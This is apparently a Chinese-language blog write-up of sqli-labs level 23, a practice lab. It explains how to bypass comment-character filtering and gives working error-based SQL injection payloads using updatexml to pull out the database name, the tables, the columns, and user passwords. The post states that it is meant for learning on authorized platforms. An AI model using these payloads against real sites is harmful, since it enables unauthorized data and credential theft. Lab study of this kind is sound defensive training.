sqli-labs关卡23(基于get提交的过滤注释符的报错注入)

无名小卒且不会安全的zzyyhh2024-01-16 17:11

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾前几关知识点

前几关是基于http头部注入,由于开发人员为了方便记录用户cookie、xff、user-agent、referer等头部信息与数据库交互,但是没有严格过滤这些参数,导致攻击者可以拼接任意sql语句到数据库中实现非法数据库查询。这一关是开始有过滤敏感字符了。

二、靶场第二十三关通关思路

  • 1、判断注入点
  • 2、爆数据库名
  • 3、爆数据库表
  • 4、爆数据库列
  • 5、爆数据库关键信息

1、判断注入点

这一关又回到了前10关的get提交的注入了,老规矩输入万能语句 and 1=1 和and 1=2 发现页面均正常,说明不是数字型。直接提交一个单引号发现报错了(如图所示),报错信息为

Warning: mysql_fetch_array() expects parameter 1 to be resource,

boolean given in C:\tools\phpstudy_pro\WWW\sqli-labs\Less-23\index.php

on line 38 You have an error in your SQL syntax; check the manual that

corresponds to your MySQL server version for the right syntax to use

near ''1'' LIMIT 0,1' at line 1


我们进一步猜想看看是不是单引号,我们构造payload

sql 复制代码 
1' and 1=1--+
sql 复制代码 
1' and 1=2--+

发现居然都是报错,按道理应该是1=1是正常的,1=2才是页面异常,难道是我们的思路错了吗?我们仔细观察,他页面异常还是单引号闭合的问题,还是因为多了一个单引号导致sql查询语句错误。所以这里应该是注释符的问题,他没有把后面多的单引号过滤掉。本来应该是id=1' and 1=1--+'的。所以考虑是注释符被过滤了,看源码发现注释符确实被过滤了,被替换为空了(如图所示)


所以我们不能用注释符构造payload了,注释符的作用其实就是为了闭合多余的一个单引号,让我们payload顺利拼接到数据库查询。既然用不了那我们自己闭合。

payload为

sql 复制代码 
1' and '1'='1

payload这样就能成功解决多一个单引号的问题了,带入数据库的语句这样就不会报错id='1' and '1'='1'(如图所示)

2、爆数据库名

这里由于不知道显位order by闭合payload,不知道显位是多少个,这里我就用报错注入了。这里后面加or '1'='1是为了闭合多余的单引号。

payload为

sql 复制代码 
1' and updatexml(1,concat(0x3a,(select database()),0x3a),1) or '1'='1

3、爆数据库表

payload为

sql 复制代码 
1' or updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1) or '1'='1

4、爆数据库列

payload为

sql 复制代码 
1' or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1) or '1'='1
sql 复制代码 
1' or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1) or '1'='1

5、爆数据库关键信息

payload为

sql 复制代码 
1' or updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1) or '1'='1
sql 复制代码 
1' or updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1) or '1'='1

总结

这一关是一个get提交的单引号闭合的注入,与之前不同的是这一关注释符被过滤为空了,我们得自己构造闭合。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

相关推荐
yzs8713 小时前
SQL Sever Pragmatic Bitmap过滤技术解析
数据库·sql
其实防守也摸鱼13 小时前
ctfshow--Crypto(funnyrsa1-密码2)解题步骤
python·安全·web安全·网络安全·密码学·web·工具
夏天测15 小时前
2026 年 5 月中旬网络安全深度预警:高危漏洞集中爆发、零日攻击常态化,企业面临多重安全挑战
安全·web安全
QCzblack15 小时前
文件上传upload
web安全
Full Stack Developme16 小时前
SQL发展历史
数据库·sql
zcn12617 小时前
关于非相关子查询改写经验
数据库·sql·sql优化改写
今天也是元气满满的一天呢17 小时前
详解SQL注入问题
网络·数据库·sql
晓梦林17 小时前
HiddenGate靶场学习笔记
笔记·安全·web安全
omenkk717 小时前
【MySQL专题】1.一条更新SQL语句是如何执行的
数据库·sql·mysql
六月雨滴18 小时前
Oracle 数据库网络安全之加密配置
数据库·web安全·oracle
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓04【AI】2026 年具身智能模型和世界模型总结05CC-Switch & Claude 基于 Linux 服务器安装使用指南06Codex 手机端连接教程:三分钟搞定,附完整步骤07人工智能最新动态 AI 日报 · 2026年5月10日08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09几个好用的ip纯净度检测网站10【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法